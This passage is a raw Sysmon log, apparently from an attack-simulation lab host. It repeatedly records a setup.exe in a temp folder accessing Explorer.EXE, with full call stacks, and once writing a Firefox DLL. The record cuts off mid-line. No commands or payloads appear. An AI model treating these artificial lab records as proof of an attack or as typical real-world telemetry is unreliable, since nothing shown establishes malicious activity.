13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\lgpllibs.dll2021-01-18 13:59:52.364 10341000x800000000000000014892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa